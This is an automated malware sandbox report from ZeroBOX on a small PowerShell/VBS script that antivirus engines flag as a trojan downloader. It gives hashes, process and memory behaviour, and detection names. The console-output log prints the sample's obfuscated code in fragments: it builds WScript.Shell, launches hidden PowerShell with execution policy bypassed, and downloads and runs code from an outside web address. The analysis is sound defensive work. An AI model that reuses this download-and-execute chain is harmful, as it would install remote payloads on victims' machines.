Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 22, 2023, 10:03 a.m.	March 22, 2023, 10:05 a.m.

Size	488.0B
Type	ASCII text, with CRLF line terminators
MD5	`be800de1da1616a9df4556f400d39ac6`
SHA256	`82b61a4c880f02274f0a3a9475a4f0286e47a74c59c452075435ec83549ebb6f`
CRC32	`9BD2B045`
ssdeep	`12:VtRtliV6aa27WtCronwfQM2CfL1Qcq77LQM6Lgdbr:/zIV6+qwrlfICef7XQM6Lgxr`
Yara	Antivirus - Contains references to security software

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\information.txt.ps1
3044

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 67 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: The term 'on' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: or operable program. Check the spelling of the name, or if a path was included console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: , verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:1 char:3 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + on <<<< error resume next console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (on:String) [], CommandNotFoundE console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: xception console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: The term 'on' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000097	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: or operable program. Check the spelling of the name, or if a path was included console_handle: 0x000000a3	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: , verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:2 char:3 console_handle: 0x000000bb	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + on <<<< error resume next console_handle: 0x000000c7	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (on:String) [], CommandNotFoundE console_handle: 0x000000d3	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: xception console_handle: 0x000000df	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000eb	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: The term 'uAJ' is not recognized as the name of a cmdlet, function, script file console_handle: 0x0000010b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x00000117	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x00000123	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:3 char:4 console_handle: 0x0000012f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + uAJ <<<< = replace("W375cript.375hEll","375","s") console_handle: 0x0000013b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (uAJ:String) [], CommandNotFound console_handle: 0x00000147	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: Exception console_handle: 0x00000153	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000015f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: The term 'uAJ' is not recognized as the name of a cmdlet, function, script file console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x0000000f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x00000027	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:4 char:27 console_handle: 0x0000003f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + Set ZEZ = CreateObject(uAJ <<<< ) console_handle: 0x0000004b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (uAJ:String) [], CommandNotFound console_handle: 0x00000057	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: Exception console_handle: 0x00000063	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000006f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: The term 'qLv' is not recognized as the name of a cmdlet, function, script file console_handle: 0x00000097	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x000000a3	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:5 char:4 console_handle: 0x000000bb	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + qLv <<<< = "Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN" console_handle: 0x000000c7	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (qLv:String) [], CommandNotFound console_handle: 0x000000d3	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: Exception console_handle: 0x000000df	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000eb	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: The term 'ZEZZEZ364' is not recognized as the name of a cmdlet, function, scrip console_handle: 0x0000010b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: t file, or operable program. Check the spelling of the name, or if a path was i console_handle: 0x00000117	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: ncluded, verify that the path is correct and try again. console_handle: 0x00000123	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:6 char:10 console_handle: 0x0000012f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + ZEZZEZ364 <<<< = " -eXeC BYPASS -NONI $FRJX36='IeX(NeW-OBJeCT NeT.W';$GSX='e console_handle: 0x0000013b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: BCLIeNT).DOWNLO';Sleep 1;[BYTe[]];Sleep 3;$SCV='UGYDS(''https://theemirateshill console_handle: 0x00000147	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: s.com//wp-includes/js/moos2.png'')'.RePLACe('UGYDS','ADSTRING');Sleep 1;IeX($FR console_handle: 0x00000153	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: JX36+$GSX+$SCV)" console_handle: 0x0000015f	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (ZEZZEZ364:String) [], CommandNo console_handle: 0x0000016b	1	1
WriteConsoleW March 22, 2023, 10:03 a.m.	buffer: tFoundException console_handle: 0x00000177	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey March 22, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005235a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005235a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005235a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005235a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005235a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005235a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 22, 2023, 10:03 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06320000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06390000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06391000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06393000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2023, 10:03 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06394000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

FireEye	Heur.BZC.PZQ.Boxter.794.FE2890B1
Sangfor	Malware.Generic-VBS.Save.34b43955
Arcabit	Heur.BZC.PZQ.Boxter.794.FE2890B1
Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/TrojanDownloader.Agent.GMW
Avast	VBS:Obfuscated-BC [Cryp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	Heur.BZC.PZQ.Boxter.794.FE2890B1
NANO-Antivirus	Trojan.Script.Downloader.jpdkfc
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.794.FE2890B1
DrWeb	PowerShell.DownLoader.1695
VIPRE	Heur.BZC.PZQ.Boxter.794.FE2890B1
Emsisoft	Heur.BZC.PZQ.Boxter.794.FE2890B1 (B)
Ikarus	Trojan.PowerShell.Agent
Avira	VBS/Dldr.Agent.vpgk
GData	Heur.BZC.PZQ.Boxter.794.FE2890B1
ALYac	Heur.BZC.PZQ.Boxter.794.FE2890B1
MAX	malware (ai score=84)
AVG	VBS:Obfuscated-BC [Cryp]

information.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All